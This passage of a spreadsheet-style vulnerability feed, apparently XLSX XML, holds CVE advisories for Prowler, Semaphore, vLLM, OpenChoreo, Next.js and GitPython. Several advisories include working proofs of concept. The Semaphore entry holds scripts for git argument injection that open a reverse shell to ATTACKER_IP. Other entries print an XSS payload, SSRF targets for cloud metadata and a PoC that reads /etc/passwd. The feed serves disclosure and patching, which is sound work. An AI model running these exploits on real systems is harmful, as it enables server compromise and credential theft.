The repository has 13,875 GitHub stars, which is above the 10,000 star floor. `SECURITY.md` is present and does not reject GitHub private reporting. The dedicated GitHub private vulnerability reporting endpoint for `prowler-cloud/prowler` returned `true`.

## Affected versions

The vulnerable sink is present in current `master` at commit `329dfdf8e6cb8bc0424fb54b6595408e20969782` and in the latest GitHub release tag `5.28.0`. The package metadata identifies the Python package as `prowler`.

## Technical details

The HTML formatter builds each finding row with an f-string in `prowler/lib/outputs/html/html.py`. Neighboring fields are explicitly escaped:

- `resource_uid` is escaped at line 85 with `.replace("&lt;", "&amp;lt;").replace("&gt;", "&amp;gt;")`.
- `status_extended` is escaped at line 87 with the same pattern.

The tag column does not apply equivalent escaping:

```python
&lt;td&gt;{parse_html_string(unroll_dict(finding.resource_tags))}&lt;/td&gt;
```

`unroll_dict` concatenates tag keys and values into a string, and `parse_html_string` only prefixes each item with an HTML bullet. Neither function escapes `&lt;`, `&gt;`, quotes, or event-handler attributes before insertion into the table cell. As a result, a tag value such as this remains active markup in the generated report:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

## Reproduction

1. Create or identify a cloud resource that Prowler will include in an HTML report.
2. Add a tag value containing a harmless proof payload, for example:

```html
&lt;img src=x onerror="window.PROWLER_TAG_XSS=1"&gt;
```

3. Run Prowler against the account and generate HTML output.
4. Open the generated HTML report in a browser.
5. The payload executes from the tags column.

A proof HTML fragment using the same formatter structure set `window.PROWLER_TAG_XSS=1` from `resource_tags`, while equivalent payloads in `resource_uid` and `status_extended` stayed text because those fields are escaped.

Local evidence:

- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-evidence-2026-05-26.json`
- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-proof-full.html`

## PoC

The minimized generated row below mirrors the vulnerable formatter output. The first and third candidate payloads are escaped controls. The middle payload is the unescaped `resource_tags` value and executes when the report is rendered.

```html
&lt;tr class="table-danger"&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_UID_XSS=1"&amp;gt;&lt;/td&gt;
  &lt;td&gt;
    &amp;#x2022;Owner=&lt;img src=x onerror="window.PROWLER_TAG_XSS=1;document.body.setAttribute('data-prowler-tag-xss','1')"&gt;
  &lt;/td&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_STATUS_XSS=1"&amp;gt;&lt;/td&gt;
&lt;/tr&gt;
```

Browser proof result from the local artifact:

```json
{"tag": 1, "uid": 0, "status": 0, "attr": "1"}
```

## Remediation

Escape tag keys and values before inserting them into HTML output. Prefer a single HTML escaping helper for every finding field that can originate from provider data. If bullets or separators are needed, build the list structure after escaping each key and value, rather than escaping the final HTML string after markup has been added.</t></is></c><c r="S103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D104" s="5" t="inlineStr" /><c r="E104" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.006</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr" /><c r="L104" s="5" t="inlineStr"><is><t>go:github.com/semaphoreui/semaphore</t></is></c><c r="M104" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N104" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O104" s="5" t="inlineStr" /><c r="P104" s="5" t="inlineStr" /><c r="Q104" s="5" t="inlineStr"><is><t>CWE-78, CWE-88</t></is></c><c r="R104" s="5" t="inlineStr"><is><t># Summary
An OS command injection in repository git_url handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=&lt;cmd&gt; option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (git_client: cmd_git); no non-default configuration is required.

# Details
The repository git_url is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:

1. git_url is never validated against option injection.
Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/git_branch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.

2. The git command is built with no -- separator.
CmdGitClient.GetLastRemoteCommitHash (db_lib/CmdGitClient.go, ~169–185) calls:
c.output(r, GitRepositoryTmpPath, "ls-remote",
           r.Repository.GetGitURL(false),   // attacker-controlled
           r.Repository.GitBranch)          // "master"
output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --:
["git", "ls-remote", "--upload-pack=&lt;cmd&gt;;true", "master"]
git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "&lt;cmd&gt; 'master'"), running &lt;cmd&gt;. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)

### Trigger — it fires in the server process.
A project schedule with a repository_id causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repository_id and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.

### Entry points:
POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).

# PoC
Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and non_admin_can_create_project: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).

### Terminal 1 — config + users + server
```
  cd ~/PoC &amp;&amp; mkdir -p tmp
  cat &gt; config.json &lt;&lt;EOF
  { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmp_path":"$PWD/tmp",
    "port":":3000","interface":"127.0.0.1",
    "cookie_hash":"$(head -c32 /dev/urandom|base64)","cookie_encryption":"$(head -c32 /dev/urandom|base64)",
    "access_key_encryption":"$(head -c32 /dev/urandom|base64)","git_client":"cmd_git",
    "non_admin_can_create_project":false,"web_host":"http://127.0.0.1:3000/" }
  EOF
  ./semaphore user add --admin --login admin  --name Admin --email admin@example.com --password 'Admin123!'  --config config.json
  ./semaphore user add        --login lowpriv --name Low   --email low@example.com   --password 'LowPriv123!' --config config.json
  ./semaphore server --config config.json
```
### Terminal 2 — attacker listener
```
  nc -lvnp 4444
```
### Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits
```
  cd ~/PoC

  cat &gt; onboard.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"
  ADMIN="${ADMIN:-admin}"; ADMIN_PASS="${ADMIN_PASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}"
  JAR=$(mktemp)
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMIN_PASS\"}" &gt;/dev/null
  PROJ_PID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \
    -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
  USER_ID=$(curl -s -b "$JAR" "$BASE/api/users" | \
    python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))")
  curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJ_PID/users" -H 'Content-Type: application/json' \
    -d "{\"user_id\":$USER_ID,\"role\":\"manager\"}" -o /dev/null
  rm -f "$JAR"; echo "[*] $MEMBER is Manager of project $PROJ_PID" &gt;&amp;2; echo "$PROJ_PID"
  EOF
  chmod +x onboard.sh

  cat &gt; rce.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}"
  PROJ_PID="${PROJ_PID:?set PROJ_PID from onboard.sh}"
  CMD="$*"; B64=$(printf '%s' "$CMD" | base64 -w0)
  GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true"
  JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; }
  post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; }
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" &gt;/dev/null
  KID=$(post /api/project/$PROJ_PID/keys "{\"name\":\"k\",\"type\":\"none\",\"project_id\":$PROJ_PID}" | jid)
  BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','project_id':$PROJ_PID,'git_url':sys.argv[1],'git_branch':'master','ssh_key_id':$KID}))" "$GITURL")
  RID=$(post /api/project/$PROJ_PID/repositories "$BODY" | jid)
  TID=$(post /api/project/$PROJ_PID/templates "{\"name\":\"t\",\"project_id\":$PROJ_PID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repository_id\":$RID,\"type\":\"\"}" | jid)
  post /api/project/$PROJ_PID/schedules "{\"name\":\"s\",\"project_id\":$PROJ_PID,\"template_id\":$TID,\"repository_id\":$RID,\"cron_format\":\"* * * * *\"}" &gt;/dev/null
  rm -f "$JAR"; echo "[*] queued as lowpriv (Manager of $PROJ_PID): $CMD"
  EOF
  chmod +x rce.sh

  PROJ_PID=$(./onboard.sh)
  ATTACKER_IP=127.0.0.1
  PROJ_PID=$PROJ_PID ./rce.sh "bash -i &gt;&amp; /dev/tcp/$ATTACKER_IP/4444 0&gt;&amp;1"
```

Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own access_key_encryption master key).

# Impact
- Type: OS command injection via argument injection — remote code execution.
- Who is impacted: any Semaphore deployment running the default git_client: cmd_git. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If non_admin_can_create_project is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)</t></is></c><c r="S104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D105" s="5" t="inlineStr" /><c r="E105" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.003</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr" /><c r="L105" s="5" t="inlineStr"><is><t>pip:vllm</t></is></c><c r="M105" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N105" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O105" s="5" t="inlineStr" /><c r="P105" s="5" t="inlineStr" /><c r="Q105" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R105" s="5" t="inlineStr"><is><t>### Summary
An integer overflow in the act_and_mul_kernel kernel can cause the output of one user request to be incorporated into the response of another request within the same inference batch. Under certain conditions, the last request in a batch can receive a partial or complete copy of the first user's inference result, resulting in cross-user data leakage.


### Details
The root cause is an integer overflow in the expression blockIdx.x * 2 * d at https://github.com/vllm-project/vllm/blob/ff712f6447093d07747c88680b9d006b119f5890/csrc/activation_kernels.cu#L82. 

As a result, the computation for one user (User A) can incorrectly consume input data from another user (User B). In particular, when 2^32 is divisible by d, the overflow can cause User A's output to contain portions of User B's inference result. In some cases, User B's response may be copied entirely into User A's response.

This constitutes a severe cross-user information disclosure vulnerability and is straightforward to trigger.
### PoC
We reproduced the issue using meta-llama/Llama-3.2-1B-Instruct, for which d = 8192.

Using the following configuration:

Batch size: 17
Sequence length: 16384

The final response in the batch becomes an exact copy of the first response in the batch, demonstrating complete cross-user data leakage.

### Impact
This vulnerability enables cross-user information disclosure. An attacker can intentionally craft requests that are processed within the same inference batch as a victim's request and cause the victim's inference output to be copied into the attacker's response.

As a result, sensitive information contained in another user's model response may be exposed to an unauthorized party.

### Versions

For versions prior and equal to 0.21.0, the bug is in csrc/activation_kernels.cu, and for versions later than 0.21.0, the bug is in csrc/libtorch_stable/activation_kernels.cu.</t></is></c><c r="S105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D106" s="5" t="inlineStr" /><c r="E106" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.003</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr" /><c r="L106" s="5" t="inlineStr"><is><t>pip:vllm</t></is></c><c r="M106" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N106" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O106" s="5" t="inlineStr" /><c r="P106" s="5" t="inlineStr" /><c r="Q106" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R106" s="5" t="inlineStr"><is><t>### Summary

`vllm/transformers_utils/processors/mimo_v2_omni.py` — the multimodal processor for `MiMoV2OmniForCausalLM` — issues `requests.get(...)` directly on user-supplied image and audio URL strings and `Image.open(...)` on user-supplied local paths, **without** the SSRF / `allowed_local_media_path` checks that `vllm.multimodal.utils.MediaConnector` was hardened with in **GHSA-qh4c-xf7m-gxfc**, **GHSA-v359-jj2v-j536**, and **GHSA-pf3h-qjgv-vcpr**.

This is the same bug class as those three published advisories, in a code path the patches missed. When a user passes a URL or local-file string through `multi_modal_data` (e.g. `LLM.generate(multi_modal_data={"image": "http://..."})`), the processor takes the unsanitized string and dispatches it without any URL-scheme allowlist, network-target allowlist, size cap, or local-path allowlist.

### Details

**File:** `vllm/transformers_utils/processors/mimo_v2_omni.py` (current `main`)

**Sink 1 — image SSRF + local-file read (`_fetch_image`, lines 231–249):**

```python
def _fetch_image(src: Any) -&gt; Image.Image:
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        if src.startswith(("http://", "https://")):
            r = requests.get(src, timeout=30)              # SSRF: no allowlist, follows redirects
            r.raise_for_status()
            return _to_rgb(copy.deepcopy(Image.open(BytesIO(r.content))))
        if src.startswith("file://"):
            return _to_rgb(Image.open(src[7:]))            # arbitrary local file read
        if src.startswith("data:image"):
            ...
        return _to_rgb(Image.open(src))                    # fallback also opens local files
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

**Sink 2 — audio SSRF (around line 471):**

```python
elif audio.startswith(("http://", "https://")):
    r = requests.get(audio, timeout=30)                    # SSRF: same pattern
    r.raise_for_status()
    file_obj = io.BytesIO(r.content)
```

**Reachability.** `_fetch_image` is invoked from `MiMoVLProcessor.process_image`:

```python
def process_image(self, image: ImageInput) -&gt; torch.Tensor:
    kw = self._resolve_img_kw(image)
    src = image.image
    if isinstance(src, (str, bytes)):
        src = _fetch_image(src)
    ...
```

`MiMoVLProcessor` is wrapped by `MiMoV2OmniMultiModalProcessor` and registered for the `MiMoV2OmniForCausalLM` model architecture (`vllm/model_executor/models/mimo_v2_omni.py:1169`). Whenever a user passes a string into `multi_modal_data["image"]` (or `["audio"]`) for this model, the unsanitized URL/path reaches the sink.

**Comparison to the recent fixes.** The remediation pattern adopted in the three earlier advisories was to route every external resource fetch through `MediaConnector`, which checks `allowed_local_media_path` and applies SSRF protection before issuing the network request. `chat_utils.py` (lines 838, 902, 924, 963, 1053, 1081) already uses `self._connector.fetch_image / fetch_audio / fetch_video`. The model processor in `mimo_v2_omni.py` was added later and skipped the connector — it calls `requests.get` and `Image.open` directly. Result: the public OpenAI chat-completion path is protected, but library use (`LLM.generate(multi_modal_data=...)`), batch processing, and any other path that lets a string reach the processor receive no protection.

### Impact

1. **SSRF — internal-network probing / cloud-metadata theft.** Standard `requests.get` follows redirects and accepts any URL. An attacker who controls a `multi_modal_data` value can:
   - read AWS / GCP / Azure instance metadata (e.g. `http://169.254.169.254/latest/meta-data/iam/security-credentials/`),
   - probe internal services on the vLLM host (`http://127.0.0.1:&lt;port&gt;`, `http://10.x.y.z`),
   - exfiltrate via DNS / HTTP timing oracles even when the body is rejected by `Image.open`.
2. **Arbitrary local file read** via `file://path` (line 242) and the unguarded fallback `Image.open(src)` (line 248). Any file readable by the vLLM process is reachable through the model pipeline; with suitable formats this exposes `/etc/passwd`, `~/.aws/credentials`, etc.
3. **Server-side traffic generation / amplification** by hammering arbitrary URLs from the vLLM host, with a 30-second timeout per request.

### Suggested remediation

Replace direct `requests.get` and bare `Image.open` paths with `MediaConnector.fetch_image` / `fetch_audio_async` (or pass the inputs through `MediaConnector` before they reach the processor):

```python
# vllm/transformers_utils/processors/mimo_v2_omni.py
from vllm.multimodal.utils import MediaConnector

_connector = MediaConnector()

def _fetch_image(src):
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        return _to_rgb(_connector.fetch_image(src))   # delegates to the hardened path
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

Same change for the audio loader at line 471. This re-uses the SSRF allowlist, `allowed_local_media_path` policy, and size caps that the previous patches added.

Alternative: forbid `str` `src` from reaching the processor and require all multi-modal pre-processing to go through `chat_utils.py` / `MediaConnector` before hitting the model. Larger surface change, but completes the architectural fix.

### Discovery

Static review on `vllm@main` (HEAD as of 2026-04-30) — found by triaging the file list against the three recent SSRF advisories: the `mimo_v2_omni.py` processor, added after those fixes, reintroduced the same bypass class.

### Reporter

Ievgen Bondarenko — `sactransport2000@gmail.com` — GitHub `@ibondarenko1`</t></is></c><c r="S106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-73843</t></is></c><c r="D107" s="5" t="inlineStr" /><c r="E107" s="5" t="inlineStr" /><c r="F107" s="5" t="inlineStr" /><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.003</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr" /><c r="L107" s="5" t="inlineStr"><is><t>go:github.com/openchoreo/openchoreo</t></is></c><c r="M107" s="5" t="inlineStr"><is><t>1.0.2, 1.1.2</t></is></c><c r="N107" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O107" s="5" t="inlineStr" /><c r="P107" s="5" t="inlineStr" /><c r="Q107" s="5" t="inlineStr"><is><t>CWE-306, CWE-668, CWE-862</t></is></c><c r="R107" s="5" t="inlineStr"><is><t>### Summary
The OpenChoreo control-plane **cluster-gateway** served its caller-facing management APIs on the same network listener that accepts data-plane agent connections. In the multi-cluster topology that listener is published outside the cluster, and the management APIs did not authenticate the calling client. A party able to reach the listener could therefore invoke privileged data-plane operations without authenticating and without passing through the OpenChoreo API server's authorization.

### Impact
An attacker who can reach the externally published cluster-gateway endpoint can perform data-plane operations normally restricted to the OpenChoreo API server and gated by its authorization — including proxying the data plane's Kubernetes API and executing commands inside workload pods. This can result in full compromise of workloads on the affected data plane (disclosure, tampering, and denial of service).

The exposure applies to the multi-cluster / remote data-plane topology, where the cluster-gateway is published outside the cluster so remote data-plane agents can connect. That same externally reachable listener also served the caller-facing management APIs, which did not authenticate the caller. Deployments that do not publish the cluster-gateway outside the cluster are not affected.

### Patches
Fixed in **1.0.2**, **1.1.2**, and **1.2.0**. The fix moves the caller-facing management APIs onto a separate internal listener that is not published outside the cluster, leaving only the agent-connection endpoint on the externally reachable listener. Upgrading is non-disruptive — no data-plane agent or configuration changes are required beyond the standard chart upgrade. Upgrade path: 1.1.x → 1.1.2, 1.0.x and earlier → 1.0.2, 1.2 line → 1.2.0.

### Workarounds
If you cannot upgrade immediately:
- If you do run remote data planes, restrict reachability of the external gateway endpoint to known data-plane source addresses only (firewall / gateway-level allowlisting).</t></is></c><c r="S107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73843</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D108" s="5" t="inlineStr" /><c r="E108" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.025</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M108" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N108" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O108" s="5" t="inlineStr" /><c r="P108" s="5" t="inlineStr" /><c r="Q108" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R108" s="5" t="inlineStr"><is><t>## Impact

A vulnerability in applications using Pages and App router without Cache Component can lead to remote code execution when the server is hosted on machines using a Windows filesystem.

## Workaround

There is no known workaround for affected windows-hosted applications. You should upgrade immediately if your server is hosted on Windows.</t></is></c><c r="S108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-76217</t></is></c><c r="D109" s="5" t="inlineStr" /><c r="E109" s="5" t="inlineStr" /><c r="F109" s="5" t="inlineStr" /><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.004</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M109" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N109" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O109" s="5" t="inlineStr" /><c r="P109" s="5" t="inlineStr" /><c r="Q109" s="5" t="inlineStr"><is><t>CWE-73, CWE-200</t></is></c><c r="R109" s="5" t="inlineStr"><is><t>## Summary

`IndexFile.remove()` and `Head.checkout()` forward `**kwargs` into `git rm` and `git checkout`
with no guard. Passing `--pathspec-from-file=&lt;file&gt;` **together with `--pathspec-file-nul`**
makes Git treat the whole file as a single NUL-delimited pathspec, and the unmatched-pathspec
error quotes it verbatim. GitPython surfaces that through `GitCommandError.stderr`, so the
entire contents of a caller-chosen file are returned to the caller in band.

This is the same primitive as Instance 2 of
[GHSA-3f7w-8rr8-f37f](https://github.com/advisories/GHSA-3f7w-8rr8-f37f) - `TagReference.create()`
with `-F`, arbitrary file read returned in band - at two sites that advisory assessed and
cleared.

## Prior art, and why I am filing rather than commenting

GHSA-3f7w-8rr8-f37f's sweep table lists these four sites with the assessment
*"`--pathspec-from-file` only reads a pathspec; no write or disclosure primitive found"*:

| Call site | git command | that advisory's assessment |
|---|---|---|
| `IndexFile.remove()` | `rm` | `--pathspec-from-file` only reads a pathspec; no write or disclosure primitive found |
| `IndexFile.move()` | `mv` | same |
| `HEAD.reset()` | `reset` | same |
| `HEAD.checkout()` | `checkout` | same |

That assessment is very nearly right, and I think that is why it held: with
`--pathspec-from-file` alone, Git splits on newlines and the error quotes only the **first
line**, which reads as an uninteresting partial. Adding `--pathspec-file-nul` - a sibling flag
of the same option, and the documented way to handle paths containing newlines - makes the
whole file one pathspec.

## Root cause

`git/index/base.py:991-1043`:

```python
def remove(self, items, working_tree=False, **kwargs):
    ...
    removed_paths = self.repo.git.rm(args, paths, **kwargs).splitlines()   # line 1043
```

`git/refs/head.py:237-268`:

```python
def checkout(self, force: bool = False, **kwargs: Any):
    ...
    self.repo.git.checkout(self, **kwargs)                                 # line 268
```

Neither has an `allow_unsafe_options` parameter or a `check_unsafe_options()` call.

## Proof of concept

```python
from git import Repo
from git.exc import GitCommandError

repo = Repo("/path/to/repo")
kw = dict(pathspec_from_file="/etc/passwd", pathspec_file_nul=True)

try:
    repo.index.remove([], **kw)          # or: repo.heads[0].checkout(**kw)
except GitCommandError as e:
    print(e.stderr)                      # &lt;- entire file contents
```

Observed on published 3.1.57, against a canary file holding three marked lines:

```
[PASS] IndexFile.remove() -&gt; `git rm` returns ALL 3 canary lines in-band
       stderr: 'fatal: pathspec 'LINE1-CANARY-4242
       LINE2-SECRET-7777
       LINE3-TAIL-9999
       ' did not match any files'
[PASS] Head.checkout() -&gt; `git checkout` returns ALL 3 canary lines in-band
       stderr: 'error: pathspec 'LINE1-CANARY-4242
       LINE2-SECRET-7777
       LINE3-TAIL-9999
       ' did not match any file(s) known to git'
[PASS] PRECISION: `git status` leaks 0/3 -- not every unguarded site discloses
[PASS] PRECISION: the GUARDED checkout-index leaks 0/3
```

The two precision controls are there so the result is about these sinks and not about the
canary being visible everywhere.

## Scope correction to the table above

Of the four sites cleared with that sentence, **two disclose and two do not**:

| Call site | disclosed? |
|---|---|
| `IndexFile.remove()` → `git rm` | **yes, full file** |
| `Head.checkout()` → `git checkout` | **yes, full file** |
| `HEAD.reset()` → `git reset` | no - `git reset` does not error on unmatched pathspecs |
| `IndexFile.move()` → `git mv` | no |

The two negatives are mentioned because "the dismissal was wrong" would overstate it: the
dismissal was wrong for half of what it covered.</t></is></c><c r="S109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76217</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-76218</t></is></c><c r="D110" s="5" t="inlineStr" /><c r="E110" s="5" t="inlineStr" /><c r="F110" s="5" t="inlineStr" /><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.007</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M110" s="5" t="inlineStr"><is><t>3.1.58</t></is></c><c r="N110" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O110" s="5" t="inlineStr" /><c r="P110" s="5" t="inlineStr" /><c r="Q110" s="5" t="inlineStr"><is><t>CWE-88, CWE-94</t></is></c><c r="R110" s="5" t="inlineStr"><is><t>## Summary
`Repo.init()` forwards `**kwargs` verbatim to `git init` with no unsafe-option guard and no `allow_unsafe_options` parameter. `git init --template=&lt;dir&gt;` copies `&lt;dir&gt;/hooks/*` into the new repo's `.git/hooks`, so an attacker-controlled `template` kwarg plants a hook that executes on the next git operation → arbitrary code execution. `--template` is already recognized as unsafe for clone (it is on `unsafe_git_clone_options`, and GHSA-6p8h-3wgx-97gf covers the clone path), but `Repo.init` is a distinct method that never received a guard and needs an independent fix.

## Root Cause
`Repo.init(path, mkdir, odbt, expand_vars, **kwargs)` is a bare `git.init(**kwargs)` (git/repo/base.py:1435) with no `check_unsafe_options` and no `allow_unsafe_options`.

## Impact
